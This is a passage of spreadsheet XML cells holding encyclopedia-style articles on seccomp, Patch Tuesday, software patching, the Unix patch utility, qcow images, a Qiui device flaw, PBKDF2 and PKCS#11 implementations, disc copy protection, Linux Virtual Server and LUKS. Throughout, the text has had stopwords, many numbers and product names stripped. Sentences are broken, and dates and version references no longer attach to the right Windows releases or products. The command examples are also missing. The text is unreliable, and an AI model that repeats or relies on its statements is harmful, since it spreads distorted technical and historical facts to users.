known user seccomp while. writing february 2009, linus torvalds expresses doubt whether seccomp actually used anyone. however, google engineer replied google exploring using seccomp sandboxing chrome browser. firejail open source linux sandbox program utilizes linux namespaces, seccomp, kernel-level security features sandbox linux wine applications. chrome version seccomp-bpf used sandbox adobe flash player. chrome version seccomp-bpf used sandbox renderers. snap specify shape application sandbox using "interfaces" snapd translates seccomp, apparmor security constructs vsftpd uses seccomp-bpf sandboxing version 3.0.0. openssh supported seccomp-bpf since version 6.0. mbox uses ptrace along seccomp-bpf create secure sandbox less overhead ptrace alone. lxd, ubuntu "hypervisor" containers firefox firefox seccomp-bpf supports seccomp since 0.2.5.1-alpha lepton, jpeg compression tool developed dropbox uses seccomp kafel configuration language, converts readable policies seccompb-bpf bytecode subgraph uses seccomp-bpf flatpak uses seccomp process isolation bubblewrap lightweight sandbox application developed flatpak minijail uses seccomp process isolation sydbox uses seccomp-bpf improve runtime security ptrace sandboxing used sandbox package builds exherbo linux distribution prevent unwanted process access filesystem network resources. pandora helper sydbox, ptrace seccomp based sandbox make sandboxing practical. this makes easy user secure computing practical purposes. sydbox repository example sandbox firefox. ptrace functionality provided library pinktrace wrapper around ptrace system call. provides robust tracing processes. pinktrace borrowing code strace submitting back necessary years. sydbox-2.0.1 ptrace anymore relies solely seccomp's newer seccomp_user_notif_flag_continue flag trace programs secure computing filters defined user. user choose filter completely kernel space filter partly user space sydbox dereferencing string network address arguments matching allow deny lists specified user using pathnames unix socket addresses including wildcard characters, ipv4 ipv6 address cidr notation. references external links official website google's chromium sandbox, lwn.net, august 2009, jake edge seccomp-nurse, sandboxing framework based seccomp documentation/prctl/seccomp_filter.txt, part linux kernel documentation security in-depth linux software: preventing mitigating security bugs</t>
  </si>
  <si>
    <t>Patch Tuesday</t>
  </si>
  <si>
    <t>patch tuesday (also known update tuesday) unofficial term used refer microsoft, adobe, oracle others regularly releases software patches software products. widely referred industry. microsoft formalized patch tuesday october 2003. patch tuesday known within microsoft also release, distinguish releases occur third fourth weeks month, respectively.patch tuesday occurs second tuesday month north america. critical security updates occasionally released outside normal patch tuesday cycle, known "out-of-band" releases. integrated windows update (wu) function concerned, patch tuesday begins 10:00 a.m. pst. vulnerability information immediately available security update guide. updates show download center added articles unlocked later. daily updates consist malware database refreshes windows defender microsoft security essentials, updates part normal patch tuesday release cycle. history starting windows microsoft included windows update installed executed, would check patches windows components, microsoft would release intermittently. with release microsoft update, system also checks updates microsoft products, microsoft office, visual studio server. earlier versions windows update suffered problems: less-experienced users often remained unaware windows update install microsoft countered issue windows automatic updates component, displayed availability updates, option automatic installation. customers multiple copies windows, corporate users, update every windows deployment company also uninstall patches issued microsoft broke existing functionality.microsoft introduced "patch tuesday" october 2003 reduce cost distributing patches. this system accumulates security patches month, dispatches second tuesday month, event system administrators prepare. following day, informally known "exploit wednesday", marks time exploits appear wild take advantage unpatched machines newly announced vulnerabilities. tuesday chosen optimal week distribute software patches. this done maximize amount time available upcoming weekend correct issues might arise patches, leaving monday free address unexpected issues might arisen preceding weekend. security implications obvious security implication security problems solution withheld public month. this policy adequate vulnerability widely known extremely obscure, always case. there cases vulnerability information became public actual worms circulating prior next scheduled patch tuesday. critical cases microsoft issues corresponding patches become ready, alleviating risk updates checked installed frequently. ignite 2015 event, microsoft revealed change distributing security patches. they release security updates home pcs, tablets phones soon ready, enterprise customers stay monthly update cycle, reworked windows update business. exploit wednesday many exploitation events seen shortly release patch; analysis patch helps exploit developers immediately take advantage previously undisclosed vulnerability, remain unpatched systems. therefore, term "exploit wednesday" coined. discontinued windows versions microsoft warned users discontinued support windows starting april 2014 users running windows afterwards would risk attacks. security patches newer windows versions reveal similar same) vulnerabilities present newer older windows versions, allow attacks devices unsupported windows versions (cf. "zero-day attacks"). however microsoft stopped fixing (and other) vulnerabilities unsupported windows versions, regardless widely known vulnerabilities became, leaving vulnerabilities unfixed devices running windows versions vulnerable attacks. microsoft made singular exception rapid spread wannacry ransomware released patches 2017 then-unsupported windows windows windows server 2003 addition supported windows versions).for windows vista "extended support" ended april 2017, leave vulnerabilities discovered afterwards unfixed, creating situation vista before.for windows (including service pack support ended january 2020, january 2023 windows 8.1; cause "unfixed vulnerabilities" issue users operating systems. support windows already ended january 2016 (with users install windows windows continue support), support windows without ended april 2013 (with ability install continue support 2020, install windows windows receive support 2020). windows major change introduction windows microsoft started release version windows twice year, microsoft's "modern lifecycle policy" newly released windows version starts "grace period" previous version regard support unlike previous windows products received infrequent updates service packs, support governed "fixed lifecycle policy". with policy home versions windows provided security feature updates called "mainstream support") months release, "enterprise" education versions months. give example: support windows home/pro version 1703 (which released april 2017) stopped microsoft october 2018, support versions 1507 1511 (released 2015) officially ended 2017. microsoft announced would give "extended support" (security feature updates) least "semi-annual channel" (sac) windows version october 2025.according microsoft "device needs install latest version (feature update) [the] current version reaches service help keep device secure remain supported microsoft". previous windows operating systems, device running unsupported version windows (which longer receives security patches) potentially affected "unfixed vulnerabilities" issue beginning "end support" date. counter microsoft designed update system home editions windows cases technically possible latest windows version downloaded installed automatically however drawn criticism problems forced upgrades introduce. addition commonly used editions like home pro, microsoft offers specialized "long-term servicing branch" (ltsb) "long-term servicing channel" (ltsc) versions windows longer support timelines, governed microsoft's "fixed lifecycle policy", e.g. "windows enterprise 2016 ltsb" receive extended support october 2026, "windows ltsc 2019" receive extended support january 2029. adoption companies sap's "security patch day", company advises users install security updates, chosen coincide patch tuesdays. adobe systems' update schedule flash player since november 2012 also coincides patch tuesday. reasons flash player comes part windows starting windows flash player updates built-in plugin based version need published time order prevent reverse-engineering threats. oracle's quarterly updates coincide patch tuesday. bandwidth impact windows update uses background intelligent transfer service (bits) download updates, using idle network bandwidth. however bits speed reported network interface (nic) calculate bandwidth. this lead bandwidth calculation errors, example fast network adapter (e.g. mbit/s) connected network slow link (e.g. kbit/s) according microsoft "bits compete full bandwidth nic] bits visibility network traffic beyond client."furthermore, windows update servers microsoft honor tcp's slow-start congestion control strategy. result, users network experience significantly slower connections machines actively retrieving updates. this particularly noticeable environments many machines individually retrieve updates shared, bandwidth-constrained link found many multi-pc homes small medium-sized businesses. bandwidth demands patching large numbers computers reduced significantly deploying windows server update services (wsus) distribute updates locally. addition updates downloaded microsoft servers, windows devices "share" updates peer-to-peer fashion windows devices local network, even windows devices internet. this potentially distribute updates faster reducing usage networks metered connection. also history microsoft windows full disclosure (computer security) references further reading evers, joris (2005-09-09). "microsoft pulls 'critical' windows update". cnet news.com. retrieved 2006-12-12. schneier, bruce july 2006). "zero-day microsoft powerpoint vulnerability". schneier security. example report vulnerability found wild timing seemingly coordinated "patch tuesday" schneier, bruce september 2006). "microsoft fairuse4wm". schneier security. example quick patch response, security issue drm-related reasons. external links microsoft patch tuesday countdown microsoft security bulletin</t>
  </si>
  <si>
    <t>Patch (computing)</t>
  </si>
  <si>
    <t>patch changes computer program supporting data designed update, fix, improve this includes fixing security vulnerabilities bugs, patches usually called bugfixes fixes. patches often written improve functionality, usability, performance program. majority patches provided software vendors operating system application updates. patches installed either programmed control human programmer using editing tool debugger. they applied program files storage device, computer memory. patches permanent (until patched again) temporary. patching makes possible modification compiled machine language object programs source code unavailable. this demands thorough understanding inner workings object code person creating patch, difficult without close study source code. someone unfamiliar program patched install patch using patch utility created another person admin. even source code available, patching makes possible installation small changes object program without need recompile reassemble. minor changes software, often easier economical distribute patches users rather redistributing newly recompiled reassembled program. although meant problems, poorly designed patches sometimes introduce problems (see software regressions). special cases updates knowingly break functionality disable device, instance, removing components update provider longer licensed. patch management part lifecycle management, process using strategy plan patches applied systems specified time. types binary patches patches proprietary software typically distributed executable files instead source code. when executed files load program memory manages installation patch code target program(s) disk. patches software typically distributed data files containing patch code. these read patch utility program performs installation. this utility modifies target program's executable file—the program's machine code—typically overwriting bytes bytes representing patch code. code space (number bytes) occupied code, place overwriting directly code. this called inline patch. code bigger code, patch utility append load record(s) containing code object file target program patched. when patched program run, execution directed code branch instructions (jumps calls) patched place code code needed. early 8-bit microcomputers, example radio shack trs-80, operating system includes patch/cmd utility accepts patch data text file applies fixes target program's executable binary file(s). patch code must place(s) memory executed runtime. inline patches difficulty, additional memory space needed programmer must improvise. naturally patch programmer first created code patched, easier. savvy programmers plan advance need reserving memory later expansion, left unused producing final iteration. other programmers involved original implementation, seeking incorporate changes later time, must find make space additional bytes needed. fortunate possible circumstance routine patched distinct module. case patch programmer need merely adjust pointers length indicators signal system components space occupied module; free populate memory space expanded patch code. routine patched exist distinct memory module, programmer must find ways shrink routine make enough room expanded patch code. typical tactics include shortening code finding efficient sequences instructions redesigning efficient algorithms), compacting message strings data areas, externalizing program functions mass storage (such disk overlays), removal program features deemed less important changes installed patch. small in-memory machine code patches manually applied system debug utility, cp/m's ms-dos's debug debuggers. programmers working interpreted basic often used poke command alter functionality system service routine interpreter itself. source code patches patches also circulate form source code modifications. case, patches usually consist textual differences source code files, called "diffs". these types patches commonly come open-source software projects. cases, developers expect users compile changed files themselves. large patches because word "patch" carries connotation small fix, large fixes different nomenclature. bulky patches patches significantly change program circulate "service packs" "software updates". microsoft windows successors (including windows 2000, windows windows vista windows "service pack" terminology. historically, used terms "fixpaks" "corrective service diskette" refer updates. history historically, software suppliers distributed patches paper tape punched cards, expecting recipient indicated part original tape deck), patch (hence name) replacement segment. later patch distributions used magnetic tape. then, invention removable disk drives, patches came software developer disk later, cd-rom mail. with widely available internet access, downloading patches developer's site automated software updates became often available end-users. starting apple's microsoft's windows operating systems gained ability automatic software updates internet. computer programs often coordinate patches update target program. automation simplifies end-user's task need execute update program, whereupon program makes sure updating target takes place completely correctly. service packs microsoft windows successors many commercial software products adopt automated strategies. some programs update internet little intervention part users. maintenance server software operating systems often takes place manner. situations system administrators control number computers, sort automation helps maintain consistency. application security patches commonly occurs manner. application size patches vary bytes hundreds megabytes; thus, significant changes imply larger size, though also depends whether patch includes entire files changed portion(s) files. particular, patches become quite large changes replace non-program data, graphics sounds files. such situations commonly occur patching computer games. compared initial installation software, patches usually take long apply. case operating systems computer server software, patches particularly important role fixing security holes. some critical patches involve issues drivers. patches require prior application patches, require prior concurrent updates several independent software components. facilitate updates, operating systems often provide automatic semi-automatic updating facilities. completely automatic updates succeeded gaining widespread popularity corporate computing environments, partly aforementioned glitches, also administrators fear software companies gain unlimited control computers. package management systems offer various degrees patch automation. usage completely automatic updates become widespread consumer market, largely fact microsoft windows added support them, service pack windows (available 2004) enabled default. cautious users, particularly system administrators, tend applying patches verify stability fixes. microsoft (w)sus supports this. cases large patches significant changes, distributors often limit availability patches qualified developers beta test. applying patches firmware poses special challenges, often involves provisioning totally firmware images, rather applying differences previous version. patch usually consists firmware image form binary data, together supplier-provided special program replaces previous version version; motherboard bios update example common firmware patch. unexpected error interruption update, power outage, render motherboard unusable. possible motherboard manufacturers safeguards place prevent serious damage; example, update procedure could make keep backup firmware case determines primary copy corrupt (usually checksum, crc). video games video games receive patches compatibility problems initial release like software, also applied change game rules algorithms. these patches prompted discovery exploits multiplayer game experience used gain unfair advantages players. extra features gameplay tweaks often added. these kinds patches common first-person shooters multiplayer capability, mmorpgs, typically complex large amounts content, almost always rely heavily patches following initial release, patches sometimes content abilities available players. because balance fairness players mmorpg severely corrupted within short amount time exploit, servers mmorpg sometimes taken short notice order apply critical patch fix. companies sometimes release games knowing bugs. computer gaming world's scorpia 1994 denounced "companies—too numerous mention—who release shoddy product knowing patches upgrades, make 'pay-testers customers". software development patches sometimes become mandatory problems libraries portions source code programs frequent maintenance. this commonly occurs large-scale software projects, rarely small-scale development. open-source projects, authors commonly receive patches many people publish patches particular problems certain functionality, like support local languages outside project's locale. example early development linux kernel (noted publishing complete source code), linus torvalds, original author, received hundreds thousands patches many programmers apply original version. patches repetitive, exists tools, coccinelle support writing generic patches applying multiple locations time (typically hundreds locations case linux kernel).the apache http server originally evolved number patches brian behlendorf collated improve ncsa httpd, hence name implies collection patches patchy server"). project's official site states name 'apache' chosen respect native american indian tribe apache. however, patchy server' explanation initially given project's website. variants hotfix hotfix quick engineering update (qfe update) single, cumulative package includes information (often form files) used address problem software product (i.e., software bug). typically, hotfixes made address specific customer situation. microsoft used term stopped favor terminology: general distribution release (gdr) limited distribution release (ldr). blizzard entertainment, however, defines hotfix change made game deemed critical enough cannot held regular content patch". point release point release minor release software project, especially intended bugs small cleanups rather significant features. often, many bugs fixed single major minor release, creating need point release. program temporary program temporary product temporary (ptf), depending date, standard terminology single fix, group fixes, distributed form ready install customers. sometimes referred “zap”. customers sometime explain acronym tongue-in-cheek manner permanent temporary practically probably fixes, option make permanent part operating system patch fixes problem. security patches security patch change applied asset correct weakness described vulnerability. this corrective action prevent successful exploitation remove mitigate threat's capability exploit specific vulnerability asset. patch management part vulnerability management cyclical practice identifying, classifying, remediating, mitigating vulnerabilities. security patches primary method fixing security vulnerabilities software. currently microsoft releases security patches month, operating systems software projects security teams dedicated releasing reliable software patches soon vulnerability announcement possible. security patches closely tied responsible disclosure. these security patches critical ensure business process affected. 2017, companies struck ransomware called wannacry encrypts files certain versions microsoft windows demands ransom bitcoin. response this, microsoft released patch stops ransomware running. service pack service pack feature pack (fp) comprises collection updates, fixes, enhancements software program delivered form single installable package. companies often release service pack number individual patches given program reaches certain (arbitrary) limit, software release shown stabilized limited number remaining issues based users' feedback tracking bugzilla. large software applications office suites, operating systems, database software, network management, uncommon service pack issued within first year product's release. installing service pack easier less error-prone installing many individual patches, even updating multiple computers network, service packs common. unofficial patches unofficial patch patch program written third party instead original developer. similar ordinary patch, alleviates bugs shortcomings. examples security fixes security specialists official patch software producers takes long. other examples unofficial patches created game community video game became unsupported abandonware. monkey patches monkey patching means extending modifying program locally (affecting running instance program). patching patching, also known live patching dynamic software updating, application patches without shutting restarting system program concerned. this addresses problems related unavailability service provided system program. method used update linux kernel without stopping system. patch applied called patch live patch. this becoming common practice mobile space. companies like rollout.io method swizzling deliver patches ecosystem. another method hot-patching apps jspatch.cloud providers often patching avoid downtime customers updating underlying infrastructure. slipstreaming computing, slipstreaming integrating patches (including service packs) installation files original app, result allows direct installation updated app.the nature slipstreaming means involves initial outlay time work, save time (and, extension, money) long term. this especially significant administrators tasked managing large number computers, typical practice installing operating system computer would original media update computer installation complete. this would take time starting up-to-date (slipstreamed) source, needing download install updates included slipstreamed source. however, patches applied fashion disadvantage discovered certain patch responsible later problems, said patch cannot removed without using original, non-slipstreamed installation source. software update systems software update systems allow updates managed users software developers. 2017 petya cyberpandemic, financial software "medoc"'s update system said compromised spread malware updates. blog cybersecurity expert mike perry states deterministic, distributed builds likely defend malware attacks software development build processes infect millions machines single, officially signed, instantaneous update. update managers also allow security updates applied quickly widely. update managers linux synaptic allow users update software installed machine. applications like synaptic cryptographic checksums verify source/local files applied ensure fidelity malware. also software release life cycle software maintenance backporting dribbleware patch (unix) porting vulnerability database delta encoding smp/e automatic fixing white (computer security) references external links jargon file version 4.4.7 entry patch detailed masters dissertation dealing security patches official linux kernel patch format 0-day patch exposing vendors (in)security performance archived 2014-01-31 wayback machine metric comparing patch performance microsoft apple</t>
  </si>
  <si>
    <t>Patch (Unix)</t>
  </si>
  <si>
    <t>computer tool patch unix program updates text files according instructions contained separate file, called patch file. patch file (also called patch short) text file consists list differences produced running related diff program original updated file arguments. updating files patch often referred applying patch simply patching files. history original patch program written larry wall (who went create perl programming language) posted mod.sources (which later became comp.sources.unix) 1985. variant program (but one) part project maintained fsf. usage context developed programmer programmers, patch frequently used updating source code newer version. because this, many people came associate patches source code, whereas patches fact applied text. patched files accumulate unneeded text, people perceive based english meaning word; patch capable removing text adding patches described confused binary patches, which, although conceptually similar, distributed update binary files comprising program release. patches software development diff files serve input patch readable text files, means easily reviewed modified humans use. addition "diff" program, diffs also produced programs, subversion, cvs, rcs, mercurial git. patches crucial component many source control systems, including cvs. advanced diffs when advanced diffs used, patches applied even files modified meantime, long modifications interfere patch. this achieved using "context diffs" "unified diffs" (also known "unidiffs"), surround change context, text immediately changed part. patch context locate region patched even displaced changes earlier file, using line numbers diffs starting point. because property, context unified diffs preferred form patches submission many software projects. features make diff patch especially popular exchanging modifications open-source software. outsiders download latest publicly available source code, make modifications send them, diff form, development team. using diffs, development team ability effectively review patches applying them, apply newer code base outside developer access usage examples create patch, could following command shell: apply patch, could following command shell: this tells patch apply changes specified files described mods.diff. patches files subdirectories require additional -pnumber option, number base directory source tree included diff, otherwise. patches undone, reversed, '-r' option: cases file identical version diff generated against, patch able applied cleanly. example, lines text inserted beginning, line numbers referred patch incorrect. patch able recover this, looking nearby lines relocate text patched. also recover lines context (for context unified diffs) altered; described fuzz. ports patch originally written unix unix-like systems, patch also ported windows many platforms. windows ports patch provided gnuwin32 unxutils. patch command also part ascii's msx-dos2 tools msx-dos version also patch (computing) quilt (software) rsync xdelta list unix commands mainframe utility iebupdte mainframe patch program, created years earlier (circa ~1964). references external links patch shell utilities reference, single unix specification, version open group diffutils (includes diff patch); documentation tools win32 win32 port tools, including diff patch dickey, thomas "diffstat make histogram diff-output". archived original 2020-01-22. retrieved 2020-05-01</t>
  </si>
  <si>
    <t>Qcow</t>
  </si>
  <si>
    <t>qcow file format disk image files used qemu, hosted virtual machine monitor. stands "qemu copy write" uses disk storage optimization strategy delays allocation storage actually needed. files qcow format contain variety disk images generally associated specific guest operating systems. three versions format exist: qcow, qcow2 qcow3 .qcow, .qcow2 .qcow3 file extensions, respectively. qemu-img command allows inspect, check, create, convert, resize take snapshot qcow images. features main characteristics qcow disk images files format grow data added. this allows smaller file sizes disk images, allocate whole image space file, even parts empty. this particularly useful file systems support sparse files, fat32.the qcow format also allows storing changes made read-only base image separate qcow file using copy write. this qcow file contains path base image able refer back required. when particular piece data read image, content retrieved stored there; not, data fetched base image.optional features include zlib-based transparent decompression. qcow2 qcow2 updated version qcow format. qcow2 supports encryption. difference original version qcow2 supports multiple snapshots using newer, flexible model storing them. official documentation format part qemu tree. references</t>
  </si>
  <si>
    <t>Qiui</t>
  </si>
  <si>
    <t>qiui chinese company manufactures internet-connected toys. company's famous product cellmate remote-controlled chastity cage, bluetooth-controlled communicates internet cellphone app. when locked, cage held closed locking pin. normal operation, locking released small electric motor controlled onboard micro-controller. october 2020, group security researchers revealed cellmate's exploitable cellmate devices could permanently locked shut, trapping user's penis device. qiui provided software work-around using updated version app, physical solution, else fails, using screwdriver disassemble device. references external links official website</t>
  </si>
  <si>
    <t>List of PBKDF2 implementations</t>
  </si>
  <si>
    <t>list software implements uses pbkdf2 derivation standard. implementations wolfssl libgcrypt bash implementation crypto-js javascript implementation openssl's implementation openbsd's implementation polarssl's implementation cyassl's implementation actionscript implementation .net framework's implementation delphi/free pascal implementation erlang implementation implementation pbkdf2 haxe javascript implementations slow, less slow, fast, benchmark java implementation (pbkdf2withhmacsha256) python implementation python standard library perl implementation (large), (small), (tiny), native perl implementation dependency hell ruby's standard library ruby implementation rust implementation rebol2 implementation implementations: native (added v5.5.0), pure implementation scala implementation common lisp implementation (ironclad) systems pbkdf2 grub protect bootloader password wi-fi protected access (wpa wpa2) used secure wi-fi wireless networks microsoft windows data protection (dpapi) opendocument encryption used openoffice.org winzip's encryption scheme. keeper password hashing. lastpass password hashing. 1password password hashing. enpass password hashing. dashlane password hashing. bitwarden password hashing. standard notes password hashing. apple's mobile operating system, protecting user passcodes passwords. mountain lion user passwords django framework, release 1.4. odoo platform modx content management framework, version 2.0. encryption decryption schema zend framework, generate encryption authentication keys. cisco type password hashes firefox sync client-side password stretching disk encryption software filesystem encryption android operating system, version 3.0. filevault (mac apple computer freeotfe (windows pocket pdas); also supports mounting linux (e.g. luks) volumes windows luks (linux unified setup) (linux) truecrypt (windows, linux, veracrypt (windows, linux, freebsd, ciphershed (windows, linux, diskcryptor (windows) cryptographic disk (netbsd) geom module freebsd softraid crypto openbsd encfs (linux, freebsd since v1.5.0 grub2 (boot loader) booster (secure initramfs linux) safeguard enterprise (windows osx) boxcryptor encryption software based references</t>
  </si>
  <si>
    <t>List of Compact Disc and DVD copy protection schemes</t>
  </si>
  <si>
    <t>this list notable copy protection schemes dvd. medias, list copy protection schemes. commercial protection schemes cd-cops requires user enter cd-code reads embedded cd-code) describes geometry correctly locate data disc. safedisc (versions 1-5) adds unique digital signature time manufacturing designed difficult copy transfer software able detect copied media. safecast encryption expire pre-determined date media used temporarily. also used implement trial editions programs. securom limits number activated time key. starforce asks serial install startup verify license. tages verifies authentic copy checking existence "twin sectors" sectors logical address different data. however, twin sectors hard read order copy easy write. commercial protection schemes analog protection system adds pulses analog video signals negatively impact circuit recording device images copied dvds becomes garbled. sony arccos protection inserting corrupted sectors areas normal players access ripping software trigger errors replication. burst cutting area writing barcode circular area near center disc (referred burst cutting area) cannot written without using special equipment. dvd-cops cd-cops previous section. region code restricts region media played matching region number configuration flag players. laserlock includes hidden directory containing corrupted data cause errors copied. protectdisc software adds unique digital signature cannot transferred copy copy. solution software games provided protect software. protectdisc video prevents ripping software analyze structure dvd. solution video-dvds provided protect software. safedisc (version safedisc (versions 1-5) previous section. securom previous section. tages previous section. commercial audio cd/dvd protection schemes cactus data shield works intentionally violating book digital audio standards, erroneous disc navigation corrupted data, prevents successful ripping data. however, original disc play correctly cd/dvd players. wavy data track discs' data track wavy instead straight, discs wavy-shaped data track playable. extended copy protection (xcp) installs software computer agreement eula first time media inserted, software watch ripper software trying access cd-drive. this copy protection defeated simply using computer running microsoft windows, using account administrative privileges, preventing installer running, long since discontinued public relations disaster caused software behaving identically rootkit. key2audio another deliberate violation book standard intended make play players computers applying bogus data track onto disc manufacturing, players ignore non-audio tracks. system could disabled tracing outer edge felt-tip marker. mediamax installs software computer tries play media software cannot read data directly audio discs cd-rom drive. silently installing software computer created controversy modifying computer's behaviour without user's consent. console cd/dvd protection schemes dreamcast (gd-rom) multiple table contents (toc) made normal player read beyond first track. however, could read gd-rom reader swapping disc reading fake toc. fade creates fake scratches disk image copying programs automatically fix. instead alerting user copied disc detected, program play game buggy manner. playstation (cd-rom) authority pattern pressed internal circumference media, could copied, used detect authorized copies. some titles also uses libcrypt mechanism validate disc using checksum magic number subroutines. playstation (cd-rom, dvd-rom) file contains exact positions file size info disc stored position beyond file limit. game calls place directly burned copy data beyond file limit cannot played. (universal media disc) since blank media writer exists, media cannot copied, could make image file version umd) memory card. unique format also made media expensive difficult adapt. xbox (dvd) sets media descriptors used. initially, typical dvd-rom drives, short partition containing brief video seen. lead-out section disk stores second media descriptors describing bounds main partition. also contains partially-encrypted "security sector" used authentication. lead-out area typically directly accessible consumer dvd-rom hardware. furthermore, security sector located sector's header. this header information, unlike headers cd-rom disks, accessible default nearly dvd-rom drives. additional "challenges" implemented security sector table, challenge types added lifespan xbox xbox 360. these include, example earliest form, checks unreadable sectors predetermined ranges. references</t>
  </si>
  <si>
    <t>List of applications using PKCS 11</t>
  </si>
  <si>
    <t>this article lists applications software implementations using pkcs standard. applications freeotfe disk encryption system (pkcs either used encrypt critical data block, keyfile storage) mozilla firefox browser mozilla thunderbird email client opendnssec dnssec signer openssl tls/ssl library (with engine_pkcs11) gnutls tls/ssl library network security services library developed mozilla openvpn system strongswan system truecrypt disk encryption system (pkcs used trivial keyfile storage) trousers open-source software stack opensc smartcard library openssh secure shell implementation (since openssh version 5.4) opends open source directory server. oracle database uses pkcs#11 transparent data encryption database uses pkcs#11 transparent data encryption powerdns open source, authoritative server (since version 3.4.0) gnome keyring password cryptographic manager. solaris cryptographic framework pluggable cryptographic system operating system safelayer keyone trustedx product suites. pkcs11admin tool administration pkcs#11 enabled devices softhsm implementation cryptographic store accessible pkcs#11 interface certificate management securecrt client wolfssl ssl/tls library pkcs support xshell client netsarang computer, (versions support pkcs#11) ejbca certification authority software (uses pkcs#11 digital signatures) signserver server side software digitally signing time stamping documents, files code (uses pkcs#11 digital signatures wrapping/unwrapping) putty-cac fork putty supports smartcard authentication pkcs wrappers since pkcs complex many wrappers exist developer various languages. perl: crypt::pkcs11 crypt::nss::pkcs11 crypt::pkcs11::easy crypt::cryptoki php-pkcs11 pkcs11 extension including support oasis pkcs11 standard ncryptoki .net vb.net), silverlight visual basic wrapper pkcs pkcs11interop open source .net wrapper unmanaged pkcs#11 libraries python-pkcs11 complete documented pkcs#11 wrapper python pykcs11 another wrapper python pkcs11 another wrapper python java includes wrapper pkcs since version iaik pkcs#11 wrapperon github library java™ platform makes pkcs#11 modules accessible within java. pkcs11-helper simple open source interface handle pkcs tokens. sdeancomponents delphi wrapper pkcs jacknji11 java wrapper using java native access (jna) rust-pkcs11 crate rust ruby-pkcs11 ruby binding pkcs tclpkcs11 binding pkcs#11 pkcs11.net .net wrapper pkcs oracle solaris cryptographic framework pkcs11 wrapper pkcs node.js graphene high level wrapper pkcs#11 pkcs11js level wrapper pkcs#11 references</t>
  </si>
  <si>
    <t>Linux Virtual Server</t>
  </si>
  <si>
    <t>linux virtual server (lvs) load balancing software linux kernel–based operating systems. free open-source project started wensong zhang 1998, subject requirements general public license (gpl), version mission project build high-performance highly available server linux using clustering technology, provides good scalability, reliability serviceability. overview major work project develop advanced load balancing software (ipvs), application-level load balancing software (ktcpvs), cluster management components. ipvs: advanced load balancing software implemented inside linux kernel. virtual server code merged versions 2.4.x newer linux kernel mainline. ktcpvs: implements application-level load balancing inside linux kernel, february 2011 still development.lvs used building highly scalable highly available network services, web, email, media voip services, integrating scalable network services large-scale reliable e-commerce e-government applications. lvs-based solutions already deployed many real applications throughout world, including wikipedia. components depend upon linux netfilter framework, source code available net/netfilter/ipvs subdirectory within linux kernel source. able handle udp, layer-4 protocols well passive connection inspecting layer-7 packets. provides hierarchy counters /proc directory. userland utility program used configure called ipvsadm, requires superuser privileges run. schedulers implements several balancing schedulers, listed relevant source files: round-robin (ip_vs_rr.c) weighted round-robin (ip_vs_wrr.c) least-connection (ip_vs_lc.c) weighted least-connection (ip_vs_wlc.c) locality-based least-connection (ip_vs_lblc.c) locality-based least-connection replication (ip_vs_lblcr.c) destination hashing (ip_vs_dh.c) source hashing (ip_vs_sh.c) shortest expected delay (ip_vs_sed.c) never queue (ip_vs_nq.c) maglev hashing (ip_vs_mh.c) glossary commonly used terms include following: director: load balancer receives incoming client requests services directs specific "real server" handle request real servers: nodes make cluster used provide services behalf cluster client computers: computers requesting services virtual server (virtual address): address used director provide services client computers (real address): address used connect cluster nodes (directors address): address used director connect network real addresses (client address): address assigned client computer, uses source address requests sent cluster examples setting virtual http server real servers: first command assigns port address 192.168.0.1 virtual server. chosen scheduling algorithm load balancing round-robin rr). second third commands adding addresses real servers setup. forwarded network packets shall masked (-m). querying status configured setup: also virtual server netfilter nftables network scheduler references external links official website linux virtual server configuration wiki eserver bladecenter, linux, open source: blueprint e-business demand (includes component)</t>
  </si>
  <si>
    <t>Linux Unified Key Setup</t>
  </si>
  <si>
    <t>linux unified setup (luks) disk encryption specification created clemens fruhwirth 2004 originally intended linux. while disk encryption software implements different, incompatible, undocumented formats, luks implements platform-independent standard on-disk format various tools. this facilitates compatibility interoperability among different programs, also assures implement password management secure documented manner. description luks used encrypt block device. contents encrypted device arbitrary, therefore filesystem encrypted, including swap partitions. there unencrypted header beginning encrypted volume, allows (luks1) (luks2) encryption keys stored along encryption parameters cipher type size.the presence header major difference luks plain dm-crypt, since header allows multiple different passphrases used, ability change remove ease. however, header lost corrupted, device longer decryptable.encryption done multi-layer approach. first, block device encrypted using multiple master keys, encrypted active user keyslot. while keyslots often contain passphrase, kinds keys include openpgp public keys x.509 certificates. public keys used combination openpgp smart card inserted host. this layered scheme known tks1.there versions luks, luks2 features resilience header corruption, using argon2 encryption algorithm default, whereas luks1 uses pbkdf2. conversion versions luks possible certain situations, features available luks1 argon2. luks2 uses json metadata format.available cryptographic algorithms depends individual kernel support host. libgcrypt used backend hashing, supports algorithms. operating system vendor choose default algorithm. luks1 makes anti-forensics technique called afsplitter, allowing secure data erasure protection. using luks logical volume management used alongside luks. luks when used unlocked luks container, underlying partitions (which logical volumes) encrypted single key. this akin splitting luks container multiple partitions. structure visible disk decrypted. luks when luks used encrypt logical volumes, encrypted volume span multiple devices. underlying volume group visible without decrypting encrypted volumes. full disk encryption common usage luks provide full disk encryption, involves encrypting root partition operating system installation, protects operating system files tampered read unauthorized parties.on linux system, boot partition (/boot) encrypted bootloader supports luks (e.g. grub). this undertaken prevent tampering linux kernel. however, first stage bootloader system partition cannot encrypted (see full disk encryption#the boot problem).on mobile linux systems, postmarketos developed osk-sdl allow full disk encrypted system unlocked using touch screen. encrypted home directories systems running systemd, systemd-homed component used encrypt individual home directories. operating system support reference implementation luks operates linux based enhanced version cryptsetup, using dm-crypt disk encryption backend. under microsoft windows, luks-encrypted disks used windows subsystem linux. (formerly, possible librecrypt, currently fundamental security holes, succeeded freeotfe, formerly doxbox.) dragonfly supports luks. installer support several linux distributions allow root device encrypted upon installation. these installers include calamares, ubiquity, debian-installer, more. on-disk format luks headers forward compatible; newer versions luks able read headers previous versions. luks1 luks2 luks2 devices begin binary header intended allow recognition fast detection blkid, also contains information checksums. strings used luks2 header null-terminated strings. directly binary header comes json area, containing objects config (configuration), keyslots, digests, segments (describes encrypted areas disk), tokens containing extra metadata.the binary format regular luks2 keyslots mostly similar predecessor, addition different per-keyslot algorithms. another type exists allow redundancy case re-encryption process interrupted. examples cryptsetup reference implementation luks frontend. encrypt device path /dev/sda1: unlock encrypted device, name mapped device name: re-encrypting re-encrypting luks container done either cryptsetup tool itself, legacy tool called cryptsetup-reencrypt. these tools also used encryption existing unencrypted filesystem, remove encryption block device.both methods similar syntax: also comparison disk encryption software references external links official website frequently asked questions (faq) librecrypt: implementation windowsluks1 specification luks2 specification</t>
  </si>
  <si>
    <t>Secure DTD2000 System</t>
  </si>
  <si>
